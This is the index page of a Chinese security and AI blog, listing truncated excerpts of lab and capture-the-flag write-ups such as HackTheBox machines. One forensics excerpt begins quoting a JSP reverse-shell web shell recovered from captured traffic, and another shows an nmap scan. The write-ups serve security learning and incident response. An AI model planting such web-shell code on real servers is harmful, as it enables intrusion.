安全 · 深度学习 · 大语言模型

在攻防与智能之间,写下所见与所学。

从攻防现场到模型推演,再到系统试验;愿每一篇都经得起回望。

62 篇文章 5 条路线

内容入口

学习与研究

AI / LLM 笔记

从数学、代码与 D2L 起步,沿着模型、论文和实验前行。

沿路线阅读
攻防与防守

安全文章

靶场、应急响应、域渗透与 CTF;从关键判断,回到防守视角。

进入归档

阅读线索

问题、证据与余白

关于此站

问题

先看它为何值得解。

证据

回到推导、代码与现场。

余白

不替未知急着下结论。

文章归档

近期更新

查看归档
  • 2025-04-29

    春秋云镜——Flarum

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-29

    HTB——Intelligence

    0x01 信息收集 ┌──(root㉿kali)-[/home/kali/HTB/Intelligence] └─# nmap -A 10.129.224.3 Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 03:08 EDT Nmap scan report for 10.129.224.3 Host is up (0.12s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open...

  • 2025-04-29

    HTB——Authority

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...

  • 2025-04-28

    HTB——Worker

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-28

    HTB——Driver

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-28

    HTB——Buff

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-26

    HTB——Outdated

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...

  • 2025-04-25

    HTB——Compiled

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-25

    HTB——Bastion

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...

  • 2025-04-24

    玄机——流量特征分析tomcat

    下载附件,是一个pcap流量包。首先要我们分析扫描的IP,使用筛选GET请求数据包,可快速定位到恶意IP。在使用查询软件即可定位IP所在城市为广州。 筛选IP源为14.0.0.120的HTTP数据包,查看访问manager路由的数据包,在Destination字段可看到访问的目的端口为8080。故8080端口提供对服务器管理面板的访问 分析攻击者使用的攻击工具,我们就需要先定位攻击者的攻击流量。找到唯一一个POST包,将包保存下来后我们使用foremost提取出之中的压缩包,解压后我们找到一个rzpmxxmm.jsp <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream ns; OutputStream vA; StreamConnector( InputStream ns, OutputStream vA ) { this.ns = ns; this.vA = vA; } public void run() { BufferedReader...

  • 2025-04-24

    HTB——Rebound

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...

  • 2025-04-23

    玄机——linux实战-CMS01

    上线后我们首先查看SSH的日志。处于/var/log/secure内。分析日志我们发现可疑IP [root@ip-10-0-10-4 log]# cat secure Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting. Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22. Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22. Mar 20 10:30:25 web-server sshd[4111]:...